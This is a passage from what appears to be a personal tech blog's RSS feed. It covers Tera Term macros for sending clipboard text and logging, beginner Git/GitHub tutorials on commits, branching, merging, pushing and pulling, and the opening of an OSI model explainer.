<pre><code class="lang-haskell">; <span class="hljs-type">Send</span> clipboard content to terminal
<span class="hljs-title">offset</span> = <span class="hljs-number">0</span>
<span class="hljs-title">do</span>
   clipb2var buff offset
<span class="hljs-title">if</span> buff &gt; <span class="hljs-number">0</span>
   send buff
<span class="hljs-title">offset</span> = offset + <span class="hljs-number">1</span>
<span class="hljs-title">loop</span> while result = <span class="hljs-number">2</span>
</code></pre>
<h1 id="heading-save-the-log">Save the log</h1>
<p>The <code>logopen</code> statement causes Tera Term to start logging and <code>logclose</code> statement tells it to stop. Anything in your terminal will be saved in the location you specified.</p>
<p>Here is an example of a macro that logs data received from the host:</p>
<pre><code class="lang-haskell">;<span class="hljs-type">Start</span> logging
<span class="hljs-title">logopen</span> <span class="hljs-string">"C:\log.txt"</span> <span class="hljs-number">0</span> <span class="hljs-number">1</span>

;<span class="hljs-type">Wait</span> for <span class="hljs-class"><span class="hljs-keyword">data</span> from the host</span>
<span class="hljs-title">wait</span> <span class="hljs-string">"&gt;"</span>
<span class="hljs-title">sendln</span> <span class="hljs-string">"show version"</span>

;<span class="hljs-type">Wait</span> for the command output

<span class="hljs-title">wait</span> <span class="hljs-string">"show version"</span>
<span class="hljs-title">wait</span> <span class="hljs-string">"&gt;"</span>

; <span class="hljs-type">Stop</span> logging
<span class="hljs-title">logclose</span>
</code></pre>
<p>This macro logs the output of the “show version” command to a file named “log.txt” in the root directory of drive C. The logopen command starts logging and the logclose command stops logging.</p>
<h1 id="heading-conclusion">Conclusion</h1>
<p>As a network engineer myself, working with a command line interface often requires the same set of commands to be executed many times.</p>
<p>The same is said for many technical-related work such as coder or tester.</p>
<p>Being able to sweep a set of commands to a terminal automatically is a great time-saver.</p>
<p>In this article, I introduced you to Tera Term Macro, a powerful language that can accelerate your workflow immensely.</p>
]]></content:encoded></item><item><title><![CDATA[Working with a Remote GitHub repository]]></title><description><![CDATA[Why do we use Remote repositories?
Remote repositories allow you to:

Back up your project.

Access a Git project from multiple computers.

Collaborate with others on different projects.


Working with a Remote repository
There are three steps to thi...]]></description><link>https://chinhnd.org/working-with-a-remote-github-repository</link><guid isPermaLink="true">https://chinhnd.org/working-with-a-remote-github-repository</guid><category><![CDATA[GitHub]]></category><category><![CDATA[Git]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Tue, 22 Aug 2023 07:47:02 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/wnShDP37vB4/upload/9acec8ff798bb8ca14a2c3d3f5eba371.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-why-do-we-use-remote-repositories">Why do we use Remote repositories?</h1>
<p>Remote repositories allow you to:</p>
<ul>
<li><p>Back up your project.</p>
</li>
<li><p>Access a Git project from multiple computers.</p>
</li>
<li><p>Collaborate with others on different projects.</p>
</li>
</ul>
<h1 id="heading-working-with-a-remote-repository">Working with a Remote repository</h1>
<p>There are three steps to this process:</p>
<ul>
<li><p>Create the remote repository on GitHub.</p>
</li>
<li><p>Add a connection to the remote repository in the local repository.</p>
</li>
<li><p>Upload (or push) data from the local repository to the remote repository.</p>
</li>
</ul>
<h2 id="heading-create-a-remote-repository">Create a Remote repository</h2>
<p>Go to https://github.com and create an account. Then you can create a new repository.</p>
<p>In Create a new repository page, you need to give some information:</p>
<ul>
<li><p>Repository name</p>
</li>
<li><p>Description</p>
</li>
<li><p>Accessibility (Public or Private )</p>
</li>
</ul>
<p>and click on the Create repository button shown in the screenshot below.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692587324991/e00a3b02-7fcf-4efb-a16d-1702f58e5fec.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-git-clone">Git clone</h2>
<p>Git allows you to get a copy of the GitHub repository for your own local machine and have your own local repository. In order to perform this task Git provides us with the <code>git clone</code> command.</p>
<p>You can get the URL by going to your Quick Setup page.</p>
<p>Or if you have an established repo, you can find it in the Code section.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692588190358/30c01ba8-e8be-4857-9532-9d902a34d20f.png" alt class="image--center mx-auto" /></p>
<p>In your local machine, open the command prompt and navigate to any folder or directory where you would like to have your local repository set, and type the following command:</p>
<pre><code class="lang-bash">$ git <span class="hljs-built_in">clone</span> https://github.com/<span class="hljs-string">'your-username'</span>/<span class="hljs-string">'your-repo'</span>
</code></pre>
<p>You will have a copy of the remote repository on your local machine.</p>
<h2 id="heading-git-push">Git Push</h2>
<p>Now let’s create a simple <code>index.html</code> file and save it in our working directory.</p>
<p>Then use <code>git add</code> command to add the file from the working directory to the staging area. Use <code>git commit</code> command to save the changes from the staging area into our local repository. You can read about <code>git add</code> and <code>git commit</code> <a target="_blank" href="https://blog.nguyenducchinh.com/github-making-your-first-commit">here</a>.</p>
<pre><code class="lang-bash">$ git status
On branch main

No commits yet

Changes to be committed:
  (use <span class="hljs-string">"git rm --cached &lt;file&gt;..."</span> to unstage)
        new file:   index.html

$ git commit -m <span class="hljs-string">"remote repo"</span>
[main (root-commit) efc93b3] remote repo
 1 file changed, 19 insertions(+)
 create mode 100644 index.html
</code></pre>
<p>Now, you can use git push to push to your remote repository.</p>
<pre><code class="lang-bash">$ git push
info: please complete authentication <span class="hljs-keyword">in</span> your browser...
Enumerating objects: 3, <span class="hljs-keyword">done</span>.
Counting objects: 100% (3/3), <span class="hljs-keyword">done</span>.
Delta compression using up to 8 threads
Compressing objects: 100% (2/2), <span class="hljs-keyword">done</span>.
Writing objects: 100% (3/3), 447 bytes | 447.00 KiB/s, <span class="hljs-keyword">done</span>.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
To https://github.com/susuomlu/git-begin.git
 * [new branch]      main -&gt; main
</code></pre>
<p>Now check back your GitHub repository, you can see the newly uploaded file.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692686887062/7b20ae03-58e6-4159-85b3-52d7ae79183a.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-git-pull">Git Pull</h2>
<p>Let’s update the <code>index.html</code> file present in the GitHub repository.</p>
<p>Open GitHub repository page, open <code>index.html</code> and click edit as shown in the screenshot below.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692687345172/5e86a4c7-93d0-47b4-9494-dd20af0f3000.png" alt class="image--center mx-auto" /></p>
<p>Choose Commit changes and write the commit message, as shown in the screenshot below.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692687705789/6ff98099-3e31-4b3c-b9a4-7cc972a4cc99.png" alt class="image--center mx-auto" /></p>
<p>Now the GitHub repository contains the latest updated version of <code>index.html</code> file. However, the local repository is now outdated.</p>
<p>In order to get this new version into our local repository, the <code>git pull</code> command is used.</p>
<pre><code class="lang-bash">$ git pull
remote: Enumerating objects: 5, <span class="hljs-keyword">done</span>.
remote: Counting objects: 100% (5/5), <span class="hljs-keyword">done</span>.
remote: Compressing objects: 100% (2/2), <span class="hljs-keyword">done</span>.
remote: Total 3 (delta 1), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (3/3), 677 bytes | 35.00 KiB/s, <span class="hljs-keyword">done</span>.
From https://github.com/susuomlu/git-begin
   efc93b3..1b054c7  main       -&gt; origin/main
Updating efc93b3..1b054c7
Fast-forward
 index.html | 1 +
 1 file changed, 1 insertions(+)
</code></pre>
<p>Refresh <code>index.html</code> file in our local machine and you will see the updated version.</p>
<h2 id="heading-git-merge-and-merge-conflict">Git Merge and Merge Conflict</h2>
<p>Merge conflict happens when developers are working on the same file and on the same lines of code.</p>
<p>When this happens Git does not know how to fix the issue and throws a merge conflict message and it is up to the developer to resolve such a situation.</p>
<p>In your local machine, open <code>index.html</code> and make changes to it.</p>
<p>After it do <code>git add</code> and <code>git commit</code> do save the changes.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692688180060/f2a24fc6-0661-4e44-86da-0967fc4aac1c.png" alt class="image--center mx-auto" /></p>
<p>Open the GitHub repository page, update <code>index.html</code> file at the same line and commit the changes.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692688351181/9dbad7ee-6732-4660-8034-5615dc50f9a4.png" alt class="image--center mx-auto" /></p>
<p>Now if we pull the code from GitHub. Since changes were made to the same file and to the same line, Git will throw a merge conflict message as shown below.</p>
<pre><code class="lang-bash">$ git pull
remote: Enumerating objects: 5, <span class="hljs-keyword">done</span>.
remote: Counting objects: 100% (5/5), <span class="hljs-keyword">done</span>.
remote: Compressing objects: 100% (2/2), <span class="hljs-keyword">done</span>.
remote: Total 3 (delta 1), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (3/3), 682 bytes | 22.00 KiB/s, <span class="hljs-keyword">done</span>.
From https://github.com/susuomlu/git-begin
   1b054c7..14e1e2c  main       -&gt; origin/main
Auto-merging index.html
CONFLICT (content): Merge conflict <span class="hljs-keyword">in</span> index.html
Automatic merge failed; fix conflicts and <span class="hljs-keyword">then</span> commit the result.
</code></pre>
<p>Let’s open <code>index.html</code> file in our local machine. You can see Git input some lines in it.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692689794039/bcd3a017-24fe-4957-bd5d-851187ec2ac5.png" alt class="image--center mx-auto" /></p>
<p>In order to resolve this issue, one of the developers has to delete all the merge conflict from <code>index.html</code> file and commit it again.</p>
<p>In this case, I decided to delete my own modification and let the</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692689722120/ed105d62-c959-4ef5-bce7-210b4a322e9f.png" alt class="image--center mx-auto" /></p>
<p><em>Note: The shortcut of</em> <code>git add</code> + <code>git commit</code> <em>is:</em> <code>git commit –am “commit message”</code></p>
<pre><code class="lang-bash">$ git commit -am <span class="hljs-string">"merge resolve"</span>
[main 8efe397] merge resolve
$ git pull
Already up to date.
</code></pre>
<p>This is the final for my series talking about the basic of how to work with Git and GitHub.</p>
<p>We went through how to work with a local repository, how to branch and merge, and finally how to work with a remote repository.</p>
<p>For older posts regarding this topic you can refer to:</p>
<p><a target="_blank" href="https://blog.nguyenducchinh.com/github-making-your-first-commit">[GitHub] Making your first commit</a></p>
<p><a target="_blank" href="https://blog.nguyenducchinh.com/github-branching-and-merging">[GitHub] Branching and Merging</a></p>
]]></content:encoded></item><item><title><![CDATA[GitHub Branching and Merging]]></title><description><![CDATA[What are Git Branches?
Suppose I'm writing an online novel. The published chapters are the main branch.
I don’t want to publish to the official line until my editor has reviewed and approved it.
So, I can make a secondary branch, work on that branch,...]]></description><link>https://chinhnd.org/github-branching-and-merging</link><guid isPermaLink="true">https://chinhnd.org/github-branching-and-merging</guid><category><![CDATA[GitHub]]></category><category><![CDATA[Git]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Mon, 14 Aug 2023 08:09:10 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/jH_-L1C_o6Q/upload/b2f62b75fd21f8976a6656562b29cf8f.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-what-are-git-branches">What are Git Branches?</h1>
<p>Suppose I'm writing an online novel. The published chapters are the main branch.</p>
<p>I don’t want to publish to the official line until my editor has reviewed and approved it.</p>
<p>So, I can make a secondary branch, work on that branch, and then submit it to be reviewed by my editor. Once they’ve approved the work I can combine that branch into the main branch.</p>
<p>If I hire an assistant, we can work on our own secondary branches. Then, only the work on a secondary branch that has been approved by both the other author and the editor will be combined with the main branch.</p>
<p>A branch represents a line of development. Branches in Git are movable pointers to commits.</p>
<p>New commits are recorded in the history of the current branch, which is called a fork in the history of the project. Every time you commit, the master branch pointer moves forward automatically.</p>
<p>A Git project can have multiple branches (or lines of development). Each of these branches is a standalone version of the project.</p>
<h1 id="heading-why-do-we-use-branches">Why do we use Branches?</h1>
<p>Branches are a powerful tool for managing your code in Git. They allow you to work on different aspects of your project without interfering with each other and allow multiple people to work on the same project at the same time.</p>
<p>You can also use branches to create pull requests on platforms like GitHub or GitLab, where other developers can review and approve your code before merging it to the main branch.</p>
<h1 id="heading-working-on-a-branch">Working on a Branch</h1>
<p>Let's go back to the original project we have in the previous post. I modified the <code>colors.txt</code> file and commit it.</p>
<pre><code class="lang-bash">❯ git status
On branch main
Changes not staged <span class="hljs-keyword">for</span> commit:
  (use <span class="hljs-string">"git add &lt;file&gt;..."</span> to update what will be committed)
  (use <span class="hljs-string">"git restore &lt;file&gt;..."</span> to discard changes <span class="hljs-keyword">in</span> working directory)
        modified:   colors.txt

no changes added to commit (use <span class="hljs-string">"git add"</span> and/or <span class="hljs-string">"git commit -a"</span>)
</code></pre>
<p>Git tells us that <code>colors.txt</code> is a modified file. It is now listed in the git status output. The colors.txt file is not staged for commit; in other words, it has not been added to the staging area.</p>
<p>Let's stage it and commit it.</p>
<pre><code class="lang-bash">❯ git add -A

❯ git commit -m <span class="hljs-string">"begin"</span>
[main 2314fbc] modified colors
 1 file changed, 1 insertion(+)

❯ git <span class="hljs-built_in">log</span>
commit 2314fbc16b12a978e455eb852c400425e389aa8a (HEAD -&gt; main)
Author: Nguyen Duc Chinh &lt;susuomlu@gmail.com&gt;
Date:   Mon Aug 14 13:14:54 2023 +0700
  begin

commit acdeedbd9540d6a4918d81e7926096a380839dd2
Author: Nguyen Duc Chinh &lt;susuomlu@gmail.com&gt;
Date:   Sat Aug 12 15:00:47 2023 +0700
  first commit
</code></pre>
<p>You just made a new commit on a branch, this case is the main branch.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1691994875943/0795a128-eb96-477b-9677-894b351a0dd4.png" alt class="image--center mx-auto" /></p>
<p>The HEAD indicates which branch you are on by referencing in .git &gt; refs &gt; heads. You can also know which branch you are on using <code>git branch</code>.</p>
<pre><code class="lang-bash">❯ git branch
* main
</code></pre>
<p>The * symbol indicates which branch you are in.</p>
<h1 id="heading-create-a-branch">Create a Branch</h1>
<p>You can use the command <code>git branch &lt;name&gt;</code> to create a new branch with the given name. This will not switch you to the new branch but only create it.</p>
<pre><code class="lang-bash">❯ git branch chapter<span class="hljs-comment">#1</span>

❯ git branch
  chapter<span class="hljs-comment">#1</span>
* main
</code></pre>
<p>To switch to the new branch, you can use <code>git checkout &lt;name&gt;</code> or <code>git switch &lt;name&gt;</code>.</p>
<pre><code class="lang-bash">❯ git checkout chapter<span class="hljs-comment">#1</span>
Switched to branch <span class="hljs-string">'chapter#1'</span>

❯ git branch
* chapter<span class="hljs-comment">#1</span>
  main
</code></pre>
<p>If I edit <code>colors.txt</code> again, then do <code>git commit -m "new branch"</code> it, the brach is now separated.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1691998741539/ae61ee87-bd5d-4f51-978c-c6ad36174455.png" alt class="image--center mx-auto" /></p>
<p>Now the HEAD is in another branch called chapter#1.</p>
<h1 id="heading-what-is-git-merge">What is Git Merge?</h1>
<p>Merge is a way of combining the changes from two different branches in Git. When you merge, you take the latest commits from one branch and apply them to another branch. This way, you can keep your code up to date and avoid conflicts. Merging is usually done when you want to integrate new features or bug fixes into your main branch.</p>
<p>You can merge using the <code>git merge</code> command, or use a graphical tool like GitHub Desktop or GitKraken.</p>
<p>There are two types of merges:</p>
<ul>
<li><p>Fast-forward merges</p>
</li>
<li><p>Three-way merges</p>
</li>
</ul>
<h2 id="heading-fast-forward-merge">Fast-forward Merge</h2>
<p>Let’s assume I work on my book <code>colors.txt</code> and I add commits C and D to the chapter#1 branch.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1691999218289/24643b8b-3e7c-4059-9e38-6fb82694ca55.png" alt class="image--center mx-auto" /></p>
<p>When I merge using the <code>git merge</code> command, a fast-forward merge would occur.</p>
<p>In this case, we can say the branches have not diverged. During the fast-forward merge, the main branch pointer simply moves forward to point to the commit that the chapter#1 branch points to, which is D.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1691999443587/ab6c4699-3135-403b-8c7e-545e9584c287.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-three-way-merge">Three-way Merge</h2>
<p>Now suppose I decide to make a chapter#8 branch to work on chapter 8 of my book <code>colors.txt</code>, and I make commits E and F.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1691999953213/4e1bb581-6ad1-41e6-b8ec-196cacfceae1.png" alt class="image--center mx-auto" /></p>
<p>If I merge the chapter#8 branch into the main branch, it can’t be a Fast-forward merge because there is no way to just move the branch pointer forward to combine these two development histories.</p>
<p>Instead, a merge commit will be created to tie the two development histories together. This is Three-way Merge.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692000213086/dfd64bff-1745-4798-ac92-cb82577a2631.png" alt class="image--center mx-auto" /></p>
<p>In this topic, I introduced the concept of branches as different lines of development and showed they are movable pointers to different commits.</p>
<p>We also learn what merging is, know the two types of merges, and explained how the type of merge that will be carried out depends on the development histories of the branches involved in the merge.</p>
<p>In the next topic, we will learn about Pushing and Pulling from a Remote Repository.</p>
]]></content:encoded></item><item><title><![CDATA[Making your first GitHub commit]]></title><description><![CDATA[What are Git and GitHub?
Git is a distributed version control system that tracks changes in any set of computer files. It is usually used for coordinating work among programmers who are collaboratively developing source code during software developme...]]></description><link>https://chinhnd.org/making-your-first-github-commit</link><guid isPermaLink="true">https://chinhnd.org/making-your-first-github-commit</guid><category><![CDATA[GitHub]]></category><category><![CDATA[Git]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Mon, 14 Aug 2023 01:42:08 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/4vMfb8srdTQ/upload/90167ff7cebfaf5ba6aa42aa41c9d938.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-what-are-git-and-github"><em>What are Git and GitHub?</em></h1>
<p>Git is a distributed version control system that tracks changes in any set of computer files. It is usually used for coordinating work among programmers who are collaboratively developing source code during software development.</p>
<p>GitHub is a cloud-based service for software development and version control using Git.</p>
<p>In summary, Git is a tool that developers install locally to manage source code while GitHub is an online service to which developers who use Git can connect and upload or download resources.</p>
<h1 id="heading-repositories"><em>Repositories</em></h1>
<p>A repository (also known as a repo) is how we refer to a project version controlled by Git.</p>
<p>There are two types of repositories:</p>
<ul>
<li><p>Local repositories are repositories that are stored on a computer.</p>
</li>
<li><p>Remote repositories are repositories that are hosted on a hosting service.</p>
</li>
</ul>
<p>There are many company that provides hosting for projects using Git. The main hosting services are GitHub, GitLab, and BitBucket.</p>
<h1 id="heading-working-directory"><em>Working Directory</em></h1>
<p>The working directory contains the files and directories in the project directory that represent one version of a project.</p>
<p>It is where you add, edit, and delete files and directories.</p>
<p>Suppose the Book project that I am working on has 100 chapters, and I have 100 text files, one for each chapter: <code>chapter_one.txt</code>, <code>chapter_two.txt</code>, and so on.</p>
<p>To add each of these chapter files to my project, I would create these files in the working directory.</p>
<p>If I wanted to make any changes to the content of those chapters, I would start by editing the files in the working directory.</p>
<p>And finally, if I decided I wanted to remove an entire chapter of my book, I would delete the corresponding file in the working directory.</p>
<h1 id="heading-local-repositories"><em>Local Repositories</em></h1>
<p>To turn a directory into a Git repository you have to initialize it.</p>
<p>When you initialize a repository, the .git directory is automatically created inside the project</p>
<p>directory.</p>
<p>To initialize a Git repository, you use the</p>
<pre><code class="lang-bash">❯ git init -b &lt;branch-name&gt; &lt;project-name&gt;
</code></pre>
<p>command. Your current directory must be the project directory you want to turn into a repository when you execute this command.</p>
<p>For example:</p>
<pre><code class="lang-bash">❯ git init -b main git-begin
</code></pre>
<p>will create the current directory as a Git directory with the branch name <code>main</code>.</p>
<pre><code class="lang-bash"> Directory: C:\Users\nguyenducchinh\git-begin
    Mode                 LastWriteTime         Length Name
    ----                 -------------         ------ ----
    da-h--         8/12/2023   2:07 PM                .git
</code></pre>
<p>Now you successfully init a Git local repository. This is what it currently looks like:</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/587b900540f97734da6ce1ef85af93ea867bac9f0d80df12e7a233521a293041.webp" alt /></p>
<p>Within the .git repository, there are two important areas we want to explore further: the staging area and the commit history.</p>
<pre><code class="lang-bash">Directory: C:\Users\nguyenducchinh\git-begin\.git
    Mode                 LastWriteTime         Length Name
    ----                 -------------         ------ ----
    d-----         8/12/2023   2:07 PM                hooks
    d-----         8/12/2023   2:07 PM                info
    d-----         8/12/2023   2:07 PM                objects
    d-----         8/12/2023   2:07 PM                refs
    -a----         8/12/2023   2:07 PM            130 config
    -a----         8/12/2023   2:07 PM             73 description
    -a----         8/12/2023   2:07 PM             21 HEAD
</code></pre>
<p>We’ll take a look at those next and also discuss the concept of a commit in a little more detail.</p>
<h3 id="heading-staging-area"><em>Staging area</em></h3>
<p>The staging area is similar to a rough draft space. It is where you can add and remove files when you are preparing what you want to include in the next saved version of your project (your next commit). The staging area is represented by a file in the .git directory called index.</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/851fee595c75b4aea0956e93a2b31a422be08857d83cadc50b327d0cb42b1906.webp" alt /></p>
<h3 id="heading-commit-history"><em>Commit History</em></h3>
<p>The commit history is where you can think of your commits existing. It is represented by the objects directory inside the .git directory.</p>
<p>Now that we have a complete Git diagram showing the most important areas when working with Git, let’s add the first file to the project and use a text editor to edit it.</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/2b15e073dfba00570cb757e6b1a8a24d65ee31426a609600fa831cad174e7510.webp" alt /></p>
<h2 id="heading-making-a-commit"><em>Making a Commit</em></h2>
<p>What is a commit? A commit represents one version of a project. Every time you want to save a new version of a project, you can make a commit.</p>
<p>Committing is important because it allows you to back up your work. A common saying in the world of Git is “commit early, commit often”. Once you’ve made a commit, you’ll be able to go back and look at that commit to see what your project looked like at that point in time and avoid the frustration of losing unsaved work.</p>
<p>We will create one file, called colors.txt, in our working directory. This is now what our project looks like:</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/8c66bde6e7123ac58dc3cc2b313282fa4ef8122d7edfe3918dd10ca6a1ea99e0.webp" alt /></p>
<p>Making a commit is a two-step process:</p>
<ul>
<li><p>Add all the files you want to include in the next commit to the staging area.</p>
</li>
<li><p>Make a commit with a commit message.</p>
</li>
</ul>
<pre><code class="lang-bash">❯ git status
On branch main
No commits yet

Untracked files:
(use <span class="hljs-string">"git add &lt;file&gt;..."</span> to include <span class="hljs-keyword">in</span> what will be committed)
        colors.txt

nothing to commit (create/copy files and use <span class="hljs-string">"git add"</span> to track)
</code></pre>
<p>The ”git status” output informs you:</p>
<ul>
<li><p>No commits history yet.</p>
</li>
<li><p>The colors.txt file is an untracked file.</p>
</li>
<li><p>Git gives you the instructions that you need to add the untracked file to the staging area: use "git add &lt;file&gt;..." to include in what will be committed.</p>
</li>
</ul>
<h3 id="heading-add-file-to-the-staging-area"><em>Add file to the Staging area</em></h3>
<p>To add files to the staging area, you use the <code>git add</code> command. If you only want to add individual files that you have edited to the staging area, then you can pass in the filename or filenames to the git add command as arguments. To add all the files you have edited or changed in your working directory, you can use the git add command with the -A option (which stands for “all”).</p>
<pre><code class="lang-bash">❯ git add -A

❯ git status

On branch main
No commits yet
Changes to be committed:
    (use <span class="hljs-string">"git rm --cached &lt;file&gt;..."</span> to unstage)
        new file:   colors.txt
</code></pre>
<p>As mentioned in above, the staging area allows you to choose which updated files (or changes) will be included in your next commit. You can see the file colors.txt will be in the next commit.</p>
<p>This is what our project looks like:</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/81ca09b871c25d20535038706fbc2691b1449effa7b2c42b37714c1dfbd82103.webp" alt /></p>
<p>The <code>git add</code> command does not move a file from the working directory to the staging area, it creates a copy of the file from the working directory into the staging area.</p>
<p>With the colors.txt file in the staging area, we are now ready to make a commit with a commit message</p>
<h3 id="heading-make-a-commit"><em>Make a Commit</em></h3>
<p>To make a commit, you will use the <code>git commit</code> command and pass in the <code>-m</code> option (which stands for “message”). The message should usually be a brief description of the changes you made in this version of the project.</p>
<pre><code class="lang-bash">❯ git commit -m <span class="hljs-string">"first commit"</span>
 [main (root-commit) a513742] first commit
   1 file changed, 0 insertions(+), 0 deletions(-)
   create mode 100644 colors.txt
</code></pre>
<p>Now that we have made the first commit in the repository, let’s take a look at the information you can find about this commit in the commit history. Let see <code>git log</code></p>
<pre><code class="lang-bash">❯ git <span class="hljs-built_in">log</span>

commit a51374292e065da20b52ea4f9c377134cd5e0761 (HEAD -&gt; main)
Author: Nguyen Duc Chinh &lt;susuomlu@gmail.com&gt;\
Date:   Sat Aug 12 15:00:47 2023 +0700
  first commit
</code></pre>
<p>The <code>git log</code> output shows:</p>
<ul>
<li><p>The full commit hash of the commit.</p>
</li>
<li><p>The author of commit.</p>
</li>
<li><p>The date and time at which the commit was made.</p>
</li>
<li><p>The commit message, which in this case is ”first commit”.</p>
</li>
</ul>
<p>This is what our project looks like:</p>
<p><img src="https://telescopecdn.ams3.digitaloceanspaces.com/images/34366265653835622d316266362d343331312d616464332d353564306538313363653735/9c0ab2008642ad7619af46ca1e6d13323178ef03cbd52d314415004d928ee137.webp" alt /></p>
<p>In this topic, I introduced the different areas you will interact with when working with Git: the working directory, the staging area, the commit history, and the local repository.</p>
<p>We also learn the two steps of making a commit: adding files to the staging area and making a commit with a commit message and making a first commit in the repository.</p>
<p>In the next topic, we will learn about Git Braches and Merge.</p>
]]></content:encoded></item><item><title><![CDATA[The OSI Networking Model]]></title><description><![CDATA[What Is OSI?
The Open Systems Interconnection (OSI) model is a conceptual model that describes how different communication systems talk to each other on a computer network
OSI was the first standard model for network communications, adopted by all ma...]]></description><link>https://chinhnd.org/the-osi-networking-model</link><guid isPermaLink="true">https://chinhnd.org/the-osi-networking-model</guid><category><![CDATA[networking]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Wed, 02 Aug 2023 06:26:39 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/40XgDxBfYXM/upload/3ba5559e00d8e587961c4ed437cdbed1.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-what-is-osi"><strong>What Is OSI?</strong></h1>
<p>The Open Systems Interconnection (OSI) model is a conceptual model that describes how different communication systems talk to each other on a computer network</p>
<p>OSI was the first standard model for network communications, adopted by all major computer and telecommunication companies in the early 1980s.</p>
<p>The modern Internet is not based on OSI but on the simpler TCP/IP model. However, the OSI 7-layer model is still widely used, as it helps visualize and communicate how networks operate and helps isolate and troubleshoot networking problems.</p>
<h1 id="heading-osi-layers"><strong>OSI Layers</strong></h1>
<p>OSI contains 7 layers.</p>
<p>These layers are the Application, Presentation, Session, Transport, Network, Data link, and Physical layer.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1691976394211/6f88d899-a0f9-465f-af62-35cbe404c534.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-application-layer"><strong>Application Layer</strong></h2>
<p>The application layer is used by user-facing software such as web browsers or email clients.</p>
<p>This layer provides services that include: e-mail, transferring files, distributing results to the user, directory services, network resources, and so on.</p>
<p>It provides protocols that allow the software to send and receive information and present meaningful data to users.</p>
<p>A few examples of application layer protocols are the Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP), Post Office Protocol (POP), Simple Mail Transfer Protocol (SMTP), Domain Name System (DNS), Teletype Network Protocol (Telnet),...</p>
<p>Depending on the information the user wants to send over the network, a specific protocol is used:</p>
<ul>
<li><p>The SMTP or POP3 protocol is used to send an e-mail message.</p>
</li>
<li><p>The FTP protocol is used to transmit a file over the network.</p>
</li>
<li><p>The Telnet protocol is used to control a remote device.</p>
</li>
</ul>
<h2 id="heading-presentation-layer"><strong>Presentation Layer</strong></h2>
<p>The presentation layer prepares data for the application layer.</p>
<p>It ensures that the information that the application layer of one system is readable by the application layer of another system. It defines how two devices should encode, encrypt, and compress data so it is received correctly on the other end.</p>
<p>Simply put, the presentation layer serializes complex data structures into flat byte strings (using mechanisms such as TLV, XML, or JSON) before giving them to the application layer.</p>
<h2 id="heading-session-layer"><strong>Session Layer</strong></h2>
<p>The session layer creates communication channels between devices.</p>
<p>It is responsible for opening sessions, ensuring they remain open and functional while data is being transferred, and closing them when communication ends.</p>
<p>It also offers other services such as authentication and reconnection after an interruption. It creates checkpoints and recovery, which is useful for re-transmitting data in case of a system failure.</p>
<h2 id="heading-transport-layer"><strong>Transport Layer</strong></h2>
<p>The transport layer is responsible for providing end-to-end communication between two devices.</p>
<p>On the sender end, the transport layer divides a message into smaller segments that contain a sequence number and the port address. Then it reassembles the segments on the receiving end, turning them back into data that can be used by the session layer.</p>
<p>The transport layer provides two types of services: connection-oriented and connectionless services.</p>
<ul>
<li><p>The Transmission Control Protocol (TCP) is a connection-oriented protocol that provides reliable data transfer. It establishes a connection between two devices before transmitting data. TCP provides error checking and flow control mechanisms to ensure that data is transmitted reliably.</p>
</li>
<li><p>The User Datagram Protocol (UDP) is a connectionless protocol that provides fast data transfer. It does not establish a connection before transmitting data. UDP does not provide error checking or flow control mechanisms, so data may be lost or arrive out of order.</p>
</li>
</ul>
<h2 id="heading-network-layer"><strong>Network Layer</strong></h2>
<p>The network layer is responsible for routing data packets from one network to another. It provides logical addressing and routing services.</p>
<p>It typically uses Internet Protocol (IP) addresses to route packets to a destination node.</p>
<p>It determines the best path for data transmission based on network conditions and traffic load.</p>
<p>The network layer also provides congestion control mechanisms to ensure that data is transmitted at an optimal rate.</p>
